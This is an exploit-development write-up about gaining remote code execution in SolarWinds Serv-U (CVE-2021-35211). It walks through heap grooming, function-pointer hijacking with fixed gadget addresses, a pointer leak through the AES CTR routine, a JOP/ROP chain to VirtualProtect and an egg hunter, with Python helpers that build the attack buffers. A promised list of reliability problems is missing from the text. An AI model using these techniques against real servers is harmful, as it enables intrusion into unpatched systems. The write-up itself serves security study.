23 September 2021
In my last post, I provided an analysis of the vulnerability in SolarWinds Serv-U, CVE-2021-35211. Picking up from where I left off, this post will discuss my approach to achieving (a super unstable) RCE in Serv-U on Windows 10. As usual, for those who are here for the exploit, it can be found here.
As we now know, by sending packets in an invalid order, we can trigger Serv-U to dereference and call the function pointer dat->block from an uninitialised heap buffer here. How then can we control the value of the function pointer?
From the source here, we see that the function pointer is dereferenced from the structure EVP_AES_KEY. As dat->block compiles to offset 0xf8 in this structure, and block and stream are each 8 bytes, I deduced that the structure has a size of 0xf8 + 8 (block) + 8 (stream) = 0x108 bytes.
typedef struct {
    union {
        OSSL_UNION_ALIGN;
        AES_KEY ks;
    } ks;
    block128_f block;   // +0x0f8
    union {
        cbc128_f cbc;
        ctr128_f ctr;
    } stream;           // +0x100
} EVP_AES_KEY;          // +0x108
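As a sanity check of that arithmetic, here is a minimal sketch that mirrors the structure with Python's ctypes. The AES_KEY layout (60 32-bit round-key words plus an int for the round count) is my recollection of OpenSSL's aes.h and should be treated as an assumption, as should the use of a 64-bit integer as a stand-in for OSSL_UNION_ALIGN and for the two function pointers.

```python
import ctypes

AES_MAXNR = 14  # assumption: value taken from OpenSSL's aes.h


class AES_KEY(ctypes.Structure):
    # Assumed layout: round keys followed by the round count.
    _fields_ = [
        ("rd_key", ctypes.c_uint32 * (4 * (AES_MAXNR + 1))),
        ("rounds", ctypes.c_int),
    ]


class KeySchedule(ctypes.Union):
    _fields_ = [
        ("align", ctypes.c_uint64),  # stand-in for OSSL_UNION_ALIGN
        ("ks", AES_KEY),
    ]


class EVP_AES_KEY(ctypes.Structure):
    _fields_ = [
        ("ks", KeySchedule),
        ("block", ctypes.c_uint64),   # 8-byte function pointer on x64
        ("stream", ctypes.c_uint64),  # union of two 8-byte function pointers
    ]


if __name__ == "__main__":
    print("block offset :", hex(EVP_AES_KEY.block.offset))
    print("stream offset:", hex(EVP_AES_KEY.stream.offset))
    print("total size   :", hex(ctypes.sizeof(EVP_AES_KEY)))
```

Under these assumptions the key schedule is 244 bytes, padded to 248 (0xf8) by the 8-byte alignment of the union, which agrees with the offset seen in the disassembly.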
On Windows 10, blocks of this size will be allocated from the Low-Fragmentation Heap (LFH). To my knowledge, the LFH works by allocating a large chunk of memory called a subsegment and splitting it into identically sized blocks. To service a request, it returns a randomly selected unused block from the subsegment. When a subsegment is exhausted, a new one is allocated and the process repeats again.
Figure 1. Windows 10 LFH
Theoretically, it is possible for me to make enough allocations to exhaust the current subsegment, then exhaust the new subsegment and subsequently free all but one block of the new subsegment, which would ensure the next block that I allocate will always contain content I control.
Figure 2. Theoretical manipulation of LFH
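The last step of that idea can be illustrated with a toy model. This is only a sketch of the behaviour described above (fixed-size slots, random choice among free slots, freed memory left untouched), not a model of the real LFH, and it assumes we have already reached a fresh subsegment. The class and function names are made up for illustration.

```python
import random


class ToySubsegment:
    """Toy stand-in for one LFH subsegment: equal-sized slots, random reuse."""

    def __init__(self, slots, block_size, rng):
        self.block_size = block_size
        self.memory = [bytes(block_size) for _ in range(slots)]
        self.free_slots = set(range(slots))
        self.rng = rng

    def alloc(self):
        # Return a randomly selected unused slot.
        slot = self.rng.choice(sorted(self.free_slots))
        self.free_slots.remove(slot)
        return slot

    def write(self, slot, data):
        self.memory[slot] = data.ljust(self.block_size, b"\x00")[: self.block_size]

    def free(self, slot):
        # Assumption: freeing does not wipe the old contents.
        self.free_slots.add(slot)


def victim_sees_marker(slots=16, block_size=0x108, seed=0):
    seg = ToySubsegment(slots, block_size, random.Random(seed))
    marker = b"A" * block_size
    mine = [seg.alloc() for _ in range(slots)]  # exhaust the subsegment
    for slot in mine:
        seg.write(slot, marker)
    for slot in mine[:-1]:                      # free all but one block
        seg.free(slot)
    victim = seg.alloc()                        # the "uninitialised" buffer
    return seg.memory[victim] == marker


if __name__ == "__main__":
    print(all(victim_sees_marker(seed=s) for s in range(100)))
```

In this model every free slot holds attacker data, so the random choice no longer matters. The hard part in practice is knowing when the current subsegment has actually been exhausted.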
However, since I had no information on the remaining space in the current subsegment, and out of a bit of laziness, I decided to stick to the approach described by Microsoft.
After allocating a couple of user blocks and freeing them, there was a good chance that the next allocation would return one of the previously freed blocks. For the allocation and freeing, I simply sent SSH2_MSG_DEBUG packets with size 0x108. The packets are basically no-ops, but a buffer of size 0x108 still has to be allocated to hold the data within them, allowing us to allocate user blocks.
Figure 3. Packet to allocate block
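For readers who want to experiment, here is a minimal sketch of building an SSH debug message payload of a chosen size, following the message layout in RFC 4253 (message type, always_display flag, message string, language tag). Whether the 0x108 in the text refers to the payload, the message string or the whole packet is not something I can tell from the figure, so sizing the payload is an assumption here, and the helper names are hypothetical. The payload would still need to be wrapped in the SSH binary packet framing and encrypted before being sent.

```python
import struct

SSH_MSG_DEBUG = 4  # message number from RFC 4253


def ssh_string(data: bytes) -> bytes:
    """Encode an SSH 'string': 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data


def build_debug_payload(message: bytes, always_display: bool = False,
                        language: bytes = b"") -> bytes:
    """Build the payload of an SSH debug message (no packet framing)."""
    header = bytes([SSH_MSG_DEBUG, int(always_display)])
    return header + ssh_string(message) + ssh_string(language)


def debug_payload_of_size(total_size: int, fill: bytes = b"A") -> bytes:
    """Pad the message so the payload is exactly total_size bytes (assumption)."""
    overhead = 1 + 1 + 4 + 4  # type, flag, two length prefixes, empty language
    if total_size < overhead:
        raise ValueError("requested size is smaller than the fixed overhead")
    return build_debug_payload(fill[:1] * (total_size - overhead))


if __name__ == "__main__":
    payload = debug_payload_of_size(0x108)
    print(hex(len(payload)), payload[:8].hex())
```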
Now, I can control the function pointer. What should I set it to then?
With some incredible luck, the Serv-U DLL itself didn’t have ASLR, which meant I could jump to any location in it without an information leak. Following Microsoft’s approach, I decided to jump to 0x1800E19EC, which consists of the following instructions:
loc_1800E19EC: mov rdx, [rbx+58h]
loc_1800E19F0: mov r9d, esi
loc_1800E19F3: mov rcx, [rbx+38h]
loc_1800E19F7: mov r8, rbp
loc_1800E19FA: call qword ptr [rbx+10h]
As rbx happened to be the base of the heap buffer, this meant that I could control both rcx and rdx, which are the first 2 parameters under the Windows x64 calling convention, as well as the call target at [rbx+10h]. However, I felt that this primitive was still pretty limiting without an information leak. I could probably write to somewhere in Serv-U.dll’s memory space and then use it as a parameter, but that would have required more analysis.
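To make the offsets concrete, here is a small sketch of how a 0x108-byte buffer for this gadget could be laid out. The offsets come straight from the disassembly above and the structure layout earlier; the function name and the example values passed to it are hypothetical placeholders, not addresses from the real exploit.

```python
import struct

BLOCK_SIZE = 0x108        # size of EVP_AES_KEY
OFF_CALL_TARGET = 0x10    # call qword ptr [rbx+10h]
OFF_RCX = 0x38            # mov rcx, [rbx+38h]
OFF_RDX = 0x58            # mov rdx, [rbx+58h]
OFF_BLOCK = 0xF8          # dat->block
GADGET_ADDR = 0x1800E19EC # gadget in the non-ASLR Serv-U DLL


def build_fake_key(call_target: int, first_arg: int, second_arg: int,
                   filler: int = 0x41) -> bytes:
    """Lay out a fake EVP_AES_KEY, assuming rbx points at its first byte."""
    buf = bytearray([filler]) * BLOCK_SIZE
    for offset, value in (
        (OFF_CALL_TARGET, call_target),
        (OFF_RCX, first_arg),
        (OFF_RDX, second_arg),
        (OFF_BLOCK, GADGET_ADDR),
    ):
        struct.pack_into("<Q", buf, offset, value)
    return bytes(buf)


if __name__ == "__main__":
    # Placeholder values only; real targets would come from the DLL.
    fake = build_fake_key(0x1111111111111111, 0x2222222222222222,
                          0x3333333333333333)
    print(len(fake), fake[OFF_BLOCK:OFF_BLOCK + 8].hex())
```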
Hence, I decided to take a closer look at the context of the vulnerability. dat->block is called from CRYPTO_ctr128_encrypt, a function which does AES CTR encryption. Here’s a diagram of how this mode of AES encryption works.
Figure 4. AES CTR diagram
In the diagram above, dat->block is the AES block cipher function which acts as a pseudorandom function (PRF), providing a stream of pseudorandom bytes to XOR with the plaintext stream. In the code for CRYPTO_ctr128_encrypt, we see that dat->block is called the following way:
while (len >= 16) {
    (*block) (ivec, ecount_buf, key); // block is dat->block, key is &dat->ks
    ctr128_inc_aligned(ivec);
    for (n = 0; n < 16; n += sizeof(size_t))
        *(size_t_aX *)(out + n) =
            *(size_t_aX *)(in + n)
            ^ *(size_t_aX *)(ecount_buf + n);
    len -= 16;
    out += 16;
    in += 16;
    n = 0;
}
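The loop above can be modelled in a few lines of Python to make the data flow easier to follow. This is only a sketch: the block function here is a SHA-256 based stand-in rather than AES, the counter is treated as one 128-bit big-endian integer (my understanding of what ctr128_inc_aligned does), and only whole 16-byte blocks are handled, like the quoted loop.

```python
import hashlib


def toy_block(ivec: bytes, key: bytes) -> bytes:
    """Stand-in PRF (NOT AES): derive 16 keystream bytes from counter and key."""
    return hashlib.sha256(key + ivec).digest()[:16]


def ctr128_inc(ivec: bytes) -> bytes:
    """Increment the 16-byte counter as a big-endian integer, with wraparound."""
    value = (int.from_bytes(ivec, "big") + 1) % (1 << 128)
    return value.to_bytes(16, "big")


def ctr_encrypt(data: bytes, key: bytes, ivec: bytes, block=toy_block) -> bytes:
    """Process whole 16-byte blocks: out = in XOR block(ivec, key)."""
    out = bytearray()
    whole = len(data) - len(data) % 16
    for offset in range(0, whole, 16):
        ecount_buf = block(ivec, key)  # output of the block function
        ivec = ctr128_inc(ivec)
        chunk = data[offset:offset + 16]
        out += bytes(a ^ b for a, b in zip(chunk, ecount_buf))
    return bytes(out)


if __name__ == "__main__":
    plaintext = bytes(range(32))
    ciphertext = ctr_encrypt(plaintext, b"key", bytes(16))
    # XOR is its own inverse, so running the same routine again decrypts.
    print(ctr_encrypt(ciphertext, b"key", bytes(16)) == plaintext)
```

The point to take away is that the block function never touches the plaintext directly; whatever it leaves in ecount_buf is simply XORed into the output.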
As the input plaintext is XORed with ecount_buf after calling the block function, it is easy to infer that ecount_buf holds the output bytes of the block function. Meanwhile, key comes from &dat->ks here, and happens to point to the start of our EVP_AES_KEY structure, since ks is its first member. Knowing this, I replaced the block function with the following gadget:
loc_18004E170: mov [rdx], r8
loc_18004E173: mov rax, rdx
loc_18004E176: retn
By moving the third argument (r8) into the memory location pointed to by the second argument (rdx), I essentially did *(void**)ecount_buf = key, which changes the normal AES CTR procedure to this:
Figure 5. “AES CTR” diagram
The plaintext to encrypt was the server’s response packet, whose first 8 bytes never change. I simply had to XOR the known plaintext with the first 8 data bytes of the “encrypted” packet to leak the pointer to the key, which was the heap buffer location.
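The recovery step is just an XOR, sketched below. The gadget is modelled as writing the 8-byte key pointer into the start of ecount_buf in little-endian order; the pointer value and the "known plaintext" bytes in the usage example are made-up placeholders, since the real ones depend on the server's response.

```python
import struct


def leaky_block(ecount_buf: bytearray, key_ptr: int) -> None:
    """Model of `mov [rdx], r8`: store the key pointer at ecount_buf[0:8]."""
    struct.pack_into("<Q", ecount_buf, 0, key_ptr)


def encrypt_first_block(plaintext: bytes, key_ptr: int) -> bytes:
    """'Encrypt' one 16-byte block using the gadget as the block function."""
    ecount_buf = bytearray(16)  # bytes 8..15 are left as they were (zero here)
    leaky_block(ecount_buf, key_ptr)
    return bytes(p ^ k for p, k in zip(plaintext[:16], ecount_buf))


def recover_pointer(ciphertext: bytes, known_plaintext: bytes) -> int:
    """XOR the first 8 ciphertext bytes with the known plaintext."""
    leaked = bytes(c ^ p for c, p in zip(ciphertext[:8], known_plaintext[:8]))
    return struct.unpack("<Q", leaked)[0]


if __name__ == "__main__":
    fake_heap_ptr = 0x000001F2A3B4C5D0               # hypothetical address
    known = bytes.fromhex("0000000c0a15000000000000deadbeef")  # placeholder
    ciphertext = encrypt_first_block(known, fake_heap_ptr)
    print(hex(recover_pointer(ciphertext, known)))
```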
Now equipped with the heap leak, I made a second connection to the server and repeated the same attack, while keeping the previous connection open. I now had RIP control as well as a heap leak. At this stage, it was probably possible to do a single call to run a command of my choosing. However, I wanted remote code execution, so I decided to dig a little deeper.
Since I did not have stack control at this stage, I decided to make use of jump-oriented programming (JOP) instead of ROP to kickstart the attack. The following is the setup:
Figure 6. JOP chain
With this chain of 4 gadgets, I could now pivot the stack to the heap buffer which I controlled. For my ROP chain, the general idea was to use VirtualProtect to change a heap buffer containing shellcode to RWX, and then jump to it. The Serv-U DLL already imports GetProcAddress and LoadLibraryA, so the ROP chain would have to achieve the same effect as the following (pseudo)code:
kernel32 = LoadLibraryA("kernel32.dll");
virtualprotect = GetProcAddress(kernel32, "VirtualProtect");
(virtualprotect)(buffer_with_shellcode,   // lpAddress
                 0x100,                   // dwSize
                 0x40,                    // flNewProtect (PAGE_EXECUTE_READWRITE)
                 random_writeable_addr);  // lpflOldProtect
The ROP chain was quite complicated, so I will not go through how it works in this post, but for those who are interested, feel free to contact me.
By now, this should have been the point where I could pop calc with my shellcode and call it a day. However, I soon came to realise that the fixed size of ~0x100 of the heap buffer holding my shellcode was a limiting factor. With Metasploit, even a basic windows/x64/exec shellcode was 200+ bytes. To resolve the issue, I decided to make use of an age-old technique, the egg hunter.
On the advice of my friend, I referenced the code here and wrote a 200+ byte shellcode that functioned similarly and looked for the egg 0x1337beef.
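For anyone unfamiliar with the technique, the idea can be modelled in a few lines: a small first stage scans memory for a marker (the egg) and jumps to whatever follows it. The sketch below searches a byte string instead of process memory and is not the shellcode used in the exploit. Storing the egg in little-endian byte order and using a single copy of it are assumptions; many published egg hunters repeat the egg so that the hunter does not match its own copy of the constant.

```python
import struct
from typing import Optional

EGG = struct.pack("<I", 0x1337BEEF)  # assumption: little-endian in memory


def build_egg_payload(shellcode: bytes) -> bytes:
    """Prefix the second-stage shellcode with the egg."""
    return EGG + shellcode


def hunt(memory: bytes, egg: bytes = EGG) -> Optional[int]:
    """Return the offset just past the first egg, or None if it is absent."""
    index = memory.find(egg)
    return None if index < 0 else index + len(egg)


if __name__ == "__main__":
    stage_two = b"\xcc\xcc"  # placeholder bytes standing in for shellcode
    memory = b"\x00" * 100 + build_egg_payload(stage_two) + b"\x00" * 10
    start = hunt(memory)
    print(start, memory[start:start + len(stage_two)].hex())
```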
All that was left was to send an SSH2_MSG_DEBUG packet of arbitrary size containing the egg and shellcode. For my PoC video, I had to turn off the setting for Serv-U to run as a service, as services do not have GUIs. From there, I used a Metasploit windows/x64/exec shellcode with CMD set to calc.exe (EXITFUNC as thread) and popped calc.
Figure 7. Win
Till now, I haven’t really mentioned the reliability of my exploit. Just to make it clear, this exploit is extremely unstable, namely for these reasons:
If someone is determined enough, these problems can definitely be eliminated.
This concludes my two-month journey of exploring Serv-U and successfully exploiting a rather straightforward n-day vulnerability. Hopefully, in the future, I can work on finding some bugs of my own. :)